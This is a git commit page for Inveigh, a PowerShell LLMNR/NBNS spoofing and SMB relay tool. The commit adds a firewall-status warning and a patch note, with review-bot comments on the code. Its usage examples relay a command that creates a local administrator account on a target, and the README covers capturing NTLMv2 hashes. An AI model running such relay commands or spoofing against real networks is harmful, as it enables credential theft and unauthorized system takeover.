authorKevin Robertson <robertsonk@gmail.com>2016-08-02 21:47:26 -0400
committerKevin Robertson <robertsonk@gmail.com>2016-08-02 21:47:37 -0400
commit747b0d1f2fff960e378776a3cdcc9fd857a387dc (patch)
tree097387f685648b4da5004d952109f7b5f288fbf7
parent3dbc469024b856ef1a76157b4bf57e348a2474f2 (diff)
downloadInveigh-747b0d1f2fff960e378776a3cdcc9fd857a387dc.tar.gz
Inveigh-747b0d1f2fff960e378776a3cdcc9fd857a387dc.zip
Windows Firewall check and readme update
Added a warning for when the Windows Firewall is enabled. Added a note about the June patches likely breaking features of Invoke-InveighBruteForce.
-rw-r--r--README.md7
-rw-r--r--Scripts/Inveigh-BruteForce.ps113
-rw-r--r--Scripts/Inveigh-Relay.ps115
-rw-r--r--Scripts/Inveigh.ps116
4 files changed, 47 insertions, 4 deletions
diff --git a/README.md b/README.md
index 254b0ec..46afa85 100644
--- a/README.md
+++ b/README.md
@@ -73,7 +73,7 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
* __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
### Invoke-InveighBruteForce
-* The remote (Hot Potato method)/unprivileged NBNS brute force spoofer function. This function can be used to perform NBNS spoofing across subnets and/or perform NBNS spoofing without an elevated administrator or SYSTEM shell.
+* The remote (Hot Potato method)/unprivileged NBNS brute force spoofer function. This function can be used to perform NBNS spoofing across subnets and/or perform NBNS spoofing without an elevated administrator or SYSTEM shell.
##### Privilege Requirements:
* Regular User
@@ -84,6 +84,9 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
* Granular control of console and file output
* Run time control
+##### Notes:
+* Microsoft released patches in June 2016 that will likely prevent some of this function's features from working.
+
##### Parameters:
* __SpooferIP__ - Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Brute Force host.
* __SpooferTarget__ - Specify an IP address to target for brute force NBNS spoofing.
@@ -156,7 +159,7 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design
* __Get-InveighNTLMv2__ - Get all or unique (-unique) captured NTLMv2 challenge/response hashes
* __Watch-Inveigh__ - Enable real time console output
* __Clear-Inveigh__ - Clear Inveigh data from memory
-* __Stop-Inveigh__ - Stop all running Inveigh functions
+* __Stop-Inveigh__ - Stop all running Inveigh functions
## Miscellaneous Notes
* The local LLMNR/NBNS services do not need to be disabled on the host system.
diff --git a/Scripts/Inveigh-BruteForce.ps1 b/Scripts/Inveigh-BruteForce.ps1
index 5bdc181..2fa6cfd 100644
--- a/Scripts/Inveigh-BruteForce.ps1
+++ b/Scripts/Inveigh-BruteForce.ps1
@@ -285,6 +285,13 @@ else
$inveigh.status_queue.Add("Inveigh Brute Force started at $(Get-Date -format 's')") > $null
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Brute Force started")]) > $null
+$firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'}
+
+if($firewall_status)
+{
+ $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null
+}
+
if($NBNS -eq 'Y')
{
$inveigh.status_queue.Add("NBNS Brute Force Spoofer Target = $SpooferTarget") > $null
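Review bot: The added `netsh advfirewall show allprofiles state | where {$_ -match 'ON'}` check depends on the English wording of netsh output and on an unanchored, case-insensitive regex, so on a localized Windows build, or if netsh fails, it would likely match nothing and the warning would silently never appear. A tighter form would be `where {$_ -cmatch '^\s*State\s+ON\s*$'}`, with a comment such as `# parses English netsh text; reports "Enabled" if any profile is ON, not necessarily the active one`. Because netsh is an external executable, every start-up now also launches netsh.exe as a child of the PowerShell host, which process-creation logging on the host will record; the comment should say so. The same lines are copied into Scripts/Inveigh-Relay.ps1 and Scripts/Inveigh.ps1 in this commit, and the enclosing `else` block starts and ends outside this hunk.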
@@ -445,6 +452,12 @@ if($inveigh.status_output)
$inveigh.status_queue.RemoveRange(0,1)
}
+ "Windows Firewall = Enabled"
+ {
+ Write-Warning($inveigh.status_queue[0])
+ $inveigh.status_queue.RemoveRange(0,1)
+ }
+
default
{
Write-Output($inveigh.status_queue[0])
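Review bot: The new `"Windows Firewall = Enabled"` case only fires when the queued text matches that literal exactly, so any later rewording of the message where it is added to `$inveigh.status_queue` would silently drop it into `default` and print it with Write-Output instead of Write-Warning. Defining the text once and using it on both sides, for example `$firewall_warning = "Windows Firewall = Enabled"` (assuming both sites share a scope, which the hunk does not show), would remove that coupling. Failing that, a comment on the case such as `# must match the start-up message text exactly` would document the dependency. The same case is added to the status switch in Scripts/Inveigh-Relay.ps1 and Scripts/Inveigh.ps1; the switch statement itself begins outside the hunk.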
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1
index 70551b2..f8ce03e 100644
--- a/Scripts/Inveigh-Relay.ps1
+++ b/Scripts/Inveigh-Relay.ps1
@@ -87,7 +87,7 @@ Default = 0: (0,1,2) Enable/Disable features for better operation through extern
Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
.EXAMPLE
-Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Spring2016 /add && net localgroup administrators Dave /add"
+Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2016 /add && net localgroup administrators Dave /add"
Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay
target.
@@ -234,6 +234,13 @@ if(!$inveigh.running)
$inveigh.status_queue.Add("Inveigh Relay started at $(Get-Date -format 's')") > $null
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay started")]) > $null
+ $firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'}
+
+ if($firewall_status)
+ {
+ $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null
+ }
+
if($HTTP -eq 'Y')
{
$inveigh.HTTP = $true
@@ -402,6 +409,12 @@ if($inveigh.status_output)
$inveigh.status_queue.RemoveRange(0,1)
}
+ "Windows Firewall = Enabled"
+ {
+ Write-Warning($inveigh.status_queue[0])
+ $inveigh.status_queue.RemoveRange(0,1)
+ }
+
default
{
Write-Output($inveigh.status_queue[0])
diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1
index da0cf55..1e5ea3f 100644
--- a/Scripts/Inveigh.ps1
+++ b/Scripts/Inveigh.ps1
@@ -223,7 +223,7 @@ Invoke-Inveigh -HTTPResponse "<html><head><meta http-equiv='refresh' content='0;
Execute specifying an HTTP redirect response.
.EXAMPLE
-Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Spring2016 /add && net localgroup administrators Dave /add"
+Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2016 /add && net localgroup administrators Dave /add"
Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay
target.
@@ -478,6 +478,14 @@ else
# Write startup messages
$inveigh.status_queue.Add("Inveigh started at $(Get-Date -format 's')") > $null
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh started")]) > $null
+
+$firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'}
+
+if($firewall_status)
+{
+ $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null
+}
+
$inveigh.status_queue.Add("Listening IP Address = $IP") > $null
$inveigh.status_queue.Add("LLMNR/NBNS Spoofer IP Address = $SpooferIP") > $null
@@ -785,6 +793,12 @@ if($SMBRelay -eq 'N')
$inveigh.status_queue.RemoveRange(0,1)
}
+ "Windows Firewall = Enabled"
+ {
+ Write-Warning($inveigh.status_queue[0])
+ $inveigh.status_queue.RemoveRange(0,1)
+ }
+
default
{
Write-Output($inveigh.status_queue[0])